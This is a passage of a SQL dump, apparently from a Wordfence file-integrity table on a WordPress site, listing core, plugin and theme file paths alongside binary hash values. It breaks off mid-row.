��>','?Ύ�~-y�Ph#sbP���\Z��=��1�tՈY','',0,'?'),(',�\Z�J\'�AWh��','wp-content/plugins/wordfence/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`�L��gf�','��_�\r\0�����\0�Z}��})v[4�������','',0,'?'),(',<�� �?C]�0A�','wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ͷ���U裦�h�','��ehӧ�&έ��A�3�+WTh��\n\Z)�?��','',0,'?'),(',CYB���EMf*V{�','wp-includes/wp-includes/widgets/class-wp-widget-rss.php',0,'9aP��,\n0��cHt��','9aP��,\n0��cHt��','�t�e�������wn2�v�\0o����e��2','',0,'?'),(',G4���(���+X��4','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png',0,'�I��m���LWyݓH','�I��m���LWyݓH','�\rfl�դ/�;l\\��\\.6��r�#P�[��','',0,'?'),(',]\'N�%ݑUeT���)','wp-includes/js/dist/annotations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v��Ih��XM�}Ǔ','�\'O\n�u`i����RnoPwN�۾��p�Nj%','',0,'?'),(',a�(�f��>��k��','wp-content/plugins/wp-cerber/assets/flags/dj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�2�cV�>�!�>�','��A|�L���0��ܷ��H��̠���Y���','',0,'?'),(',x2�m�<\'$AH��Z','wp-includes/wp-includes/sodium_compat/lib/sodium_compat.php',0,'�A�\'I5��xN�$��','�A�\'I5��xN�$��','�m����<��	p�(t)P7��r�~^��闦��','',0,'?'),(',z�e��Y#uJ~[P\r','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' OpR{�ҵ��Gݍ�','�Y��:B���P5M��s_�����.ن�֎�','',0,'?'),(',���@��hj�qrޒ�','wp-includes/ID3/module.tag.id3v2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�d�4��y�N�4','aƙ�4>$�z���%�5��z	����9��_','',0,'?'),(',�hɃs?4B[�^՝','wp-includes/SimplePie/Cache/DB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w���M�\rʍ�|D�','g#�����]\"�h0Vq�)�0��j�%���I�','',0,'?'),(',�x\Zpp������L��','wp-content/plugins/wp-cerber/assets/flags/at.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v$<��dkmy\\g�','g߇���;o*���^�U㋥GjJ��>�ED\\�%','',0,'?'),(',�Y��4�����o','wp-includes/wp-includes/ID3/module.audio.mp3.php',0,'��O:B঍\0�z�6x`B','��O:B঍\0�z�6x`B','�	]����	\0On��6B;���\ZZ$�	2ЯSh','',0,'?'),(',�������lS���r','wp-includes/css/dist/editor/editor-styles-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?4��nT�#���','�D�ծ6��8g\n)e���z��l�1�MH��&','',0,'?'),(',�\rgf��Z���\r�s','wp-includes/wp-includes/sodium_compat/src/Crypto.php',0,'�-p����\0E�cb�c�','�-p����\0E�cb�c�','\"�̘�L���!�{rDnPz^��X�j��Lk','',0,'?'),(',愵�X�ա�y%�!�o','wp-content/plugins/wp-cerber/assets/flags/iq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(��C!���>�hF','�����=zZ!��i��74\'�j\"DC���͎(','',0,'?'),(',�?#:��	��5k�','wp-includes/wp-includes/js/media-audiovideo.min.js',0,'�f��}�юFǑ+���','�f��}�юFǑ+���','���U��#�QC�F����F:,�}��u���KP','',0,'?'),('--�ü��$�);��J5','wp-includes/js/dist/rich-text.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J��=$rx�p�\n�',')K�S�-\n�o����o�Vg��r�l^�H','',0,'?'),('-\\��[�����J�ץ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�1���	�M����]�','��A8��{�!��V�t<S��qH�oh�4��y`By�','',0,'?'),('-g�0�~BD�>IF���','wp-includes/wp-includes/class-walker-page.php',0,'�;C\r��7�l����','�;C\r��7�l����','q	��MQ�Anq2Y|��]�d�]����R!(�','',0,'?'),('-jާ� �����~hyb','wp-content/plugins/wordfence/lib/menu_support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�-ce$���','��\"\n�|�\'iJ���O��u;�DU���8','',0,'?'),('-kdϯ���X�w\\7���','wp-includes/admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y��\'[+�\"�c�W','J�����xb��ADHM����2������6�M�','',0,'?'),('-w�T��r�Y��90�y`','wp-content/plugins/wp-cerber/cerber-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xf�ڒ�k�Di��','�� f����7�6��\"������`)���','',0,'?'),('-����Ǹ�%w=��','wp-admin/css/colors/ocean/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������V�*,^b*$�','nh�ᷘvU�?D��4��w�Zq������w_','',0,'?'),('-���_���mq+��1�','wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h㠲���i�e��ɡ','IH�Mp\\��N�h\n׈N��F=-���Z�=hO','',0,'?'),('-��)7�5y�8c��Wv�','wp-admin/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ޫ1i��M����','��b��q�~C�,��K�yڊb��M ���','',0,'?'),('-�_��+��Yn��S','wp-includes/js/jquery/ui/tooltip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�\r��c5V����h','+*5�~oѼ�>�\\Z������c���l�','',0,'?'),('-�f��4]�#\"u��l','wp-admin/css/colors/light/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�Y�%��u#+�eR:?','8�;\0�0�p�7L��2ү���r@��n�','',0,'?'),('-���g�N�u�2s�a','wp-includes/wp-includes/css/wp-embed-template-ie.css',0,'�)6��	؞мq ���','�)6��	؞мq ���','�o��+8]�Su�H.�C�g��R9�&�+���\\W�','',0,'?'),('-��藂��Y{]ns�','wp-includes/css/wp-pointer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�U�Y�D�K�z�c','>�;��]ۼH�Ֆ&�ݟ�������`;�','',0,'?'),('-�ܕO�r�`�x;��q','wp-content/plugins/wordfence/modules/login-security/js/login.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~V���tj�:��','.�y�@�Ive\Z�?g�d����h�O�����\0','',0,'?'),('.\rUH�(����K','wp-content/themes/shootingstar/functions/about/css.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�PߦQ<�F��C�$�','��gD�k/*1��L����㮗������f�N','',0,'?'),('. �\0_oE�]A�_�0PJ','wp-includes/js/tinymce/plugins/wpautoresize/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�.�Aj_�m�r#i�','\'��C��b\"B��\\�N�N���*r&.X��J','',0,'?'),('.IhU���3��+B\Z��','wp-includes/images/admin-bar-sprite-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q����8��o��','*E��Ts���al�^�p��X���Z\0��','',0,'?'),('.QU3�x�xR��','wp-includes/wp-includes/js/jquery/ui/checkboxradio.min.js',0,'˂��_���>��Klk','˂��_���>��Klk','Ě�8�\nm��r+\"�?�~iLOVR~��C','',0,'?'),('.x��Ϯ�7����_�','wp-includes/js/mediaelement/mediaelement-and-player.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"���\n�-ۤ�Y','$9~�=:����Z�F�m}�A�5ks�	V#� �*','',0,'?'),('.��P��1��+��','wp-includes/wp-includes/customize/class-wp-customize-code-editor-control.php',0,'��jM�і���lM��_','��jM�і���lM��_','�xFZ�Kc��3�7�`Ԫ$j�g�]�Q��','',0,'?'),('.�麉D0�u�L-c�','wp-content/plugins/wordfence/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���n`K��T�Qr�','~eY�Ze�s��27��������B/=T�3oH�','',0,'?'),('.�Y����u���t)','wp-includes/wp-includes/class-pop3.php',0,'��~���k�X�_��','��~���k�X�_��','*�,\\d�W̅�\Z��)`9�N�Q�@J5h&G�','',0,'?'),('.�E�[J��l�x��','wp-content/plugins/wordfence/images/forward_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_��Z?�N)�Ҋ�:�5','���/�<>O&�ȕJR݇e�}�(��m','',0,'?'),('.��7�f�w9Pm@����','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�H�#�IHD���','�v�o�VYx�?���\n��\n&3c-\r�8�m��','',0,'?'),('.��DK\'�T�	?g�EYt','wp-includes/wp-includes/js/dist/keycodes.min.js',0,'aY�=�Q\n�x��,��','aY�=�Q\n�x��,��','���Gֻ�S�����7�֕�g]Y��P�','',0,'?'),('.��	r��\Z�Q���','wp-content/plugins/wp-cerber/assets/flags/gm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S\'�A)����zU$',']�Z��!�p������1�{f��^EQ3sH','',0,'?'),('.����Z�g����','wp-includes/wp-includes/js/wpdialog.js',0,'Ʒy\n	� ep�ԩf','Ʒy\n	� ep�ԩf','��!/�A��f�0=��G�7�h�/�uU�&g��','',0,'?'),('/�j#0à�q�%�F�','wp-includes/wp-includes/js/clipboard.min.js',0,'����r��T��tu�','����r��T��tu�','yA�y3�h�|�Г�L�����i=���>�j','',0,'?'),('/!�:�`[���I�','wp-content/themes/sg-window/img/icons/small/tumblr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C%h{j�3�/=�v�','M��_�y)�c\ZGh�r�x��\"�P;�X���f','',0,'?'),('/*:����o>�t����','wp-includes/js/dist/autop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�~�j�h��R^����','�\\���3����O��{ɪ�\"KL�8�7�','',0,'?'),('/5Lk����>U��D','wp-includes/wp-includes/css/dist/edit-post/style.min.css',0,'�����n	�VQ�H��','�����n	�VQ�H��','Y��^�Up���yx.ΕP��\0���\Z�����','',0,'?'),('/<ا^ɼf}�\"��$�','wp-includes/images/media/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�4�8�Αy�6�d�','��ø`�������f	I$ _Z�X�\"0\r��,','',0,'?'),('/`�Χ�Nd�=��e�','wp-includes/wp-includes/block-patterns/text-three-columns-buttons.php',0,'�8�tH�W��%���','�8�tH�W��%���','ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V','',0,'?'),('/w�*яz�\ndV۶\0}j','wp-includes/wp-includes/Text/Diff/Engine/native.php',0,'�S���\r��$�T','�S���\r��$�T','S��\04�v@�ű`�DG V�u�e�R��B竇3�','',0,'?'),('/|����\r>���a���T','wp-content/themes/sg-window/inc/widget-sidebar-navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��W9D�.���`J','s���\r���\\Oj��{��O#�rd��j�','',0,'?'),('/�%*=e�B�AuW!}s','wp-content/themes/sg-window/inc/widget-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���۵\\:��5�QX&�','K�Y�����~*������e,\'��2���','',0,'?'),('/��}㦿L�;?�w\\','wp-includes/Requests/Exception/HTTP/401.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';*������?�d��@','YV$���/���@=������V-��dc�','',0,'?'),('/�s��C4�������','wp-admin/network/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	w�����T�A;�}Ad','��韌�\'�MN�+�ƺ�R����g','',0,'?'),('/ɱ��x$�5Q]�c�H�','wp-includes/wp-includes/blocks/shortcode.php',0,'�0t�	�ڨ.�j�','�0t�	�ڨ.�j�','{��bw\n~��4�n\"��\"�����#.m�/#1','',0,'?'),('/鹠���ΰ1�iw��','wp-includes/images/uploader-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&-��O��Õ�~','���r�\0����\'_>��6��QW��4ڠR��','',0,'?'),('/��f��P�j>X��','wp-includes/sitemaps/class-wp-sitemaps-renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V}d��T�ܧ�C\"º',':�i��K��,�c}i1�d��4l�c�2Œ�2','',0,'?'),('/�����5SQU۶v+�','wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[\0a�C����J�','��g4W\"3~U��Ӕ�,=$\'���W�S9����','',0,'?'),('/��3��cs]m���','wp-includes/wp-includes/js/jquery/jquery.schedule.js',0,'&��T�k�f؞���','&��T�k�f؞���','��?��vEʔ��wj���C�P՝��_��','',0,'?'),('0\0\'q�x���a��r,','wp-includes/wp-includes/Requests/Utility/CaseInsensitiveDictionary.php',0,'��:��R�K�ro�H2z','��:��R�K�ro�H2z','9yԆ&/AX�H�i{b���7f���rw���=m','',0,'?'),('0#��\Z�9��U�)�','wp-includes/wp-includes/class-wp-user-query.php',0,'T�Iyʰ�BzR��>�O','T�Iyʰ�BzR��>�O','�gu,�$�bh�/7��C�<�l=��0x�3�x','',0,'?'),('0<����lڿ��J��','wp-includes/js/wp-backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�/�����7���b','���9J7�A���G���uq!@/nS]�<o�e�}�','',0,'?'),('0=��P*�3!�^G��','wp-includes/wp-includes/js/dist/element.js',0,'pO�E����6�wR%v','pO�E����6�wR%v','�h�4[��0��7-��\\{�e��$.(.���o�','',0,'?'),('0Op�1��qr7���^','wp-includes/wp-includes/random_compat/random_bytes_libsodium.php',0,'4������Տ��d�','4������Տ��d�','�I�n��6��_����ga8��y��].��','',0,'?'),('0]�qK\'�f�x����','wp-includes/js/tinymce/plugins/compat3x/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�{��p�׶�Ҡ','��m�澑�[�S3��\'�J�*��Sts�j���','',0,'?'),('0j�Vƽ�f:�5��`�\\','wp-includes/js/customize-selective-refresh.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�G�埳6�0�b�','G���i�A�w_�P�g�9����Oɓ��M�','',0,'?'),('0x�h��ͭK��3��T','wp-includes/class-wp-fatal-error-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-����v�','�\n!%�D��F��B�^�s��plhVe��7\'U��','',0,'?'),('0�)N6�ܫ�lI\'�','wp-includes/wp-includes/css/media-views-rtl.min.css',0,'m���X�Н�KH�Os8�','m���X�Н�KH�Os8�',')�Z\\��^��hG*y����2Ԏ�k]䜹Yu�5*','',0,'?'),('0����a�O�ZI|I�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�HY ��²��','zI]�_�Dz��!�bш�6�d�uY�3','',0,'?'),('0����}=�Y]q�.','wp-includes/wp-includes/option.php',0,'�]�2�ZB0����','�]�2�ZB0����','����+�9*$��<��*G�T���:*N�j���','',0,'?'),('0����k� ?ޞ���','wp-includes/js/jquery/ui/effect-scale.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',ʡ0��\\K4\'��t�','Ұ�-yߎf+�)�R��q[t�QJ��Z ?','',0,'?'),('0���E\00���X�H','wp-includes/js/colorpicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3+ h\"��C��k','�0O����ކ�������=u)��g8b/�','',0,'?'),('0���`P�V��y\0�','wp-includes/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',0,'�H\r\r�0�X/^�0R','�H\r\r�0�X/^�0R','O��1�-p�Qۊ��8�Z+�$[��j���K��','',0,'?'),('0�%,�4�)Y8 P�R��','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-name-control.php',0,'��7�f�W�՚7���','��7�f�W�՚7���','p��v�w ��ܪ9����?���a���z�','',0,'?'),('0����3��B^�','wp-content/themes/sg-window/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�ma���b䋹FJ�','�#��DOi�Bx�O4�<��G>������j٤�$','',0,'?'),('0�dۦZP�2��o�','wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ս$����6�\"�','��^h\'z�[��j���ӊ%\Z�pã��j.�S','',0,'?'),('0�8�Zʭc[c���','wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',0,'���|�Ww�b>E��yJ','���|�Ww�b>E��yJ','�\'�����~�6ȝ\nB���agz���d��Q','',0,'?'),('0�ň����}m�X9�q','wp-content/plugins/wp-cerber/assets/flags/zm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\|e�D�gk�^���','�yЩ&VUą;�}��D4E���3�)\\','',0,'?'),('0����I��\Z8�\'�x','wp-content/plugins/wp-cerber/assets/flags/tk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȕ��n��e�Y�T��','I��/�:���5s ;�#bi)��4k ����','',0,'?'),('0��$X8F�nŃk���','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�-{\'B�����Qa','m\\��\0W/v�-O�R�w�mF���}o�P��D','',0,'?'),('1!� I��<Em#','wp-content/plugins/wp-cerber/assets/flags/ee.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��h�~�\rO�����','��R�Bᣛ�݇84ɐ6B����\0ȸ�:l-�IB','',0,'?'),('1 x��!���Y�}L�','wp-includes/wp-includes/js/dist/date.js',0,'�W!j`(�YՌ�f�','�W!j`(�YՌ�f�','��2�&�;��F�7�A\nOM�X�����','',0,'?'),('1-�����g97���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�B���.��}�F�','��c�(����k1�����2�Qw4��?0','',0,'?'),('1.�g��\']�����w�','wp-includes/wp-includes/js/jquery/ui/mouse.js',0,'����IJi��\r���','����IJi��\r���','�P��<\n��+�q� ™��NJ�+��s���b���','',0,'?'),('1?o�x��<�?���6','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��a2P���KQ��i\"','����F�;L��_����-������-��N��x','',0,'?'),('1G�[��D��qW�t��','wp-content/plugins/wp-cerber/assets/flags/gy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��B��}��>_�','L�:�,���B[���aa<���w�*@������','',0,'?'),('1s�)6�Ӷ���C��Η','wp-admin/user/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T^�1�����A�|','Y��%մ9����N��?\\v\\a��M���~݋','',0,'?'),('1��K�Y�х?_�~���','wp-includes/wp-includes/l10n.php',0,'���(��C�h���#','���(��C�h���#','�Ǹ�9�1Y�����5$�?,=�M�2.��r�','',0,'?'),('1�7�F0ܩ��^ �l','wp-content/plugins/wp-cerber/admin/cerber-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��ေ�yHj�[��','Sʭ��7:Y:`�ǝ�p%��G�%����G�','',0,'?'),('1���pa�`H0ߢ�e','wp-includes/js/dist/url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0�d�M~��\nfo�{','7�M<|\'x*~��%�\r?+�a(�	�TjN�','',0,'?'),('1Ζ*&mj�v���ѓ^','wp-includes/wp-includes/css/wp-pointer.min.css',0,'1�U�Y�D�K�z�c','1�U�Y�D�K�z�c','>�;��]ۼH�Ֆ&�ݟ�������`;�','',0,'?'),('1БY���4I^p�','wp-includes/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`q8�2�G<A9\ZQ�',']�T=�76uN&=8W<�%����','',0,'?'),('1ۭz�� ~t2b?[I�','wp-includes/wp-includes/media.php',0,'D��|��ߟa]IW�S�J','D��|��ߟa]IW�S�J','R�y��n�lq��侅��.�$�����%','',0,'?'),('1�EfQ�v#)�\n�0EkQ','wp-admin/images/media-button-image.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m�	\'���A','iķ��z[����/\"� X���{�o��:��','',0,'?'),('1�U����W���P8?','wp-includes/wp-includes/class-wp-post.php',0,'�;@A��[�oh�́F�','�;@A��[�oh�́F�','Bms������AKE)(|-�c����ϡ�|��d','',0,'?'),('1��X�/�t60^Ҁ!�7','wp-includes/js/comment-reply.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Yó8y�F0��P^','�o��%cܫԕ-��zt�����Qs��<{�','',0,'?'),('1��#\'\0����ț�`','wp-includes/wp-includes/sodium_compat/namespaced/Core/Ed25519.php',0,'��v>��#��!n�(','��v>��#��!n�(','�DFUu|�v��/�]�2x_ERL2QlP93s	�15�','',0,'?'),('2J�y*�m����]W','wp-includes/js/dist/a11y.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�ۡ�v%�b�ֽ',':�*vU@��?6�d�\\��P�X�<I��','',0,'?'),('2b�U��\0��s�pd0�','wp-includes/js/clipboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����r��T��tu�','yA�y3�h�|�Г�L�����i=���>�j','',0,'?'),('2 �8u��p�y����','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519.php',0,'�ś�L�\\�Pڜ�U','�ś�L�\\�Pڜ�U','c>�5�o�������𽃐�_�T9�L~;�e7�','',0,'?'),('2:�w��m*�.#u�R','wp-includes/wp-includes/blocks/embed/block.json',0,'�B���S�):\\l�ID�','�B���S�):\\l�ID�','��$Xn�{4��aV_`�M,sbݱ�\"�*3��','',0,'?'),('2@�j�j\0�kӲ��Ә','wp-admin/includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9����\n)��Fu','4�WZ�!VH-~~`⟜�is�G�m@�7�n�','',0,'?'),('2D��%�J����?��\Z','wp-includes/js/dist/wordcount.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܦ�j�ݪO�s+��.','xb���,\Zl��5�ao-���P�<qh0�V�%\\','',0,'?'),('2O�P��m�4�L��u','wp-content/themes/sg-window/inc/widget-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����B�i�^]O','�����s |7m�R��љ��o�yO��R6��}','',0,'?'),('2Y� ��oq&�Z���','wp-includes/class-wp-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݕ��Fԯ�8f�6��','�����y{���tl+RJ���N��\nj�R','',0,'?'),('2j�L,���W\r��W$��','wp-admin/css/colors/sunrise/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����؉��	�m/J�~','�}�\r:�jg���E�˾V(]h�x��t','',0,'?'),('2r}�V�ĥ$^���n/','wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('2�E���γŷ���','wp-content/plugins/wp-cerber/assets/flags/ps.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��P-�6@%','%�AD���E���P�Ǖ��|�u��Ć�C�!','',0,'?'),('2�Hȿ��_�?96','wp-includes/wp-includes/sodium_compat/src/Core32/XChaCha20.php',0,'\r�*�un�rdu�g���','\r�*�un�rdu�g���','�ҷ<h�bo�>�W��\Z�N��� e��ia�','',0,'?'),('2�|�΢(ủt��T��','wp-admin/privacy-policy-guide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������K8ۨ��)','.�%�����]:/$zԢ��S�_�)kER��','',0,'?'),('2��㺨a|F�l3]�','wp-includes/customize/class-wp-customize-new-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�sL2/�B�����','H\'�s�ӽ����I�$��Ӧ�ͤ�X�!�','',0,'?'),('2�v��\'��9\r��z','wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('2ģ��_�D�x���','wp-content/plugins/wordfence/views/common/block-navigation-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�����~�}t.�K','M�N��������F`\r9���ӫ�rP�,Q','',0,'?'),('2��Zs��+z��','wp-includes/css/dist/block-directory/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��J�cW�&��Y�','i�+W�M�E4�\n�#S�-^�?�ݻ��,�9','',0,'?'),('2�0mK�:r²\\0\nB�','wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f��u���ן)','���Vb�p�O+	�N$�uw���}�h�\"�','',0,'?'),('2��^(��ʭ�-^x��','wp-includes/SimplePie/Enclosure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(2ROf;Vkj�','�������`�.۾H�,�x1���8q?�L�}]','',0,'?'),('3��J��c$�\Z+','wp-content/plugins/wordfence/js/date.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j��P�ER�_�c�','��B=��0�dƩ\"B�tUc��^1�>�q&�','',0,'?'),('3)e/`���/\r�Ph=','wp-content/plugins/wp-cerber/assets/flags/bf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��>��=��$�.��','�Ȋ:��h�.�n(xD⃪F\"{`iN�\0#��','',0,'?'),('3+z��.���6Q~]y[','wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�R?�\"�`�$�`','!	�n�‚�śU7B��5gr�	1�*;R�','',0,'?'),('3-�\'����*�.�%B','wp-includes/wp-includes/js/codemirror/esprima.js',0,'d_� �S��g��ٛ��','d_� �S��g��ٛ��',']�;�%Js��lx��Fq��BH\Z�U8��','',0,'?'),('3C�V�Z�:w�\'G���','wp-includes/wp-includes/Requests/Exception/HTTP/431.php',0,'��s|b$��ѓ<��','��s|b$��ѓ<��','�ꅱ��/Y6_���w�pk�w���0���','',0,'?'),('3fDr)�{��w��	#','wp-content/plugins/wordfence/css/jquery-ui.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}O�^�0tGG��Q','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('3g���W��Zf9�','wp-includes/wp-includes/cron.php',0,'$�B�돗��QG�z','$�B�돗��QG�z','8�+\'p���|��ц�K��O�<�_e�-','',0,'?'),('3h���\"I+[��E','wp-includes/js/clipboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԓs� 5C�ɚ�b��LF','���ʿ�Iv�+>Y�h�b�F\\x��v�.wT','',0,'?'),('3k��oW�5	k[mq','wp-admin/includes/continents-cities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W_��T�ӰI�Y�֛','2ɟ��tb;6@\Zq\'��Q��H�j	��m���ѫ�','',0,'?'),('3n�Ú1\Z�����','wp-content/themes/sg-window/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��eĽ5�\n�{�ȗ','\\X��J4��|�(�4�8U}i�s\"���hs�C�','',0,'?'),('3p���\\�8�lD�q','wp-includes/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��*�kLwB��d�=','ec[d�M?H�|�KY�\04��@� QA��:FF �','',0,'?'),('3p�DL���ﳲƔ��','wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.js',0,'/a��Lru�4�\Z�','/a��Lru�4�\Z�','���Ϸ��yd�ix�{�p+��n�eځ��f�','',0,'?'),('3z\'�O��v�J&�� ','wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=��p�5%�h$�*�','s�B`]��b��p�M���0�\\�s�w�D{����','',0,'?'),('3�S�#ǣ+Ke�\0Ⱦ','wp-content/plugins/wp-cerber/assets/flags/la.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3MU\'���\Zkr�c&��','[�lԬ�`�l 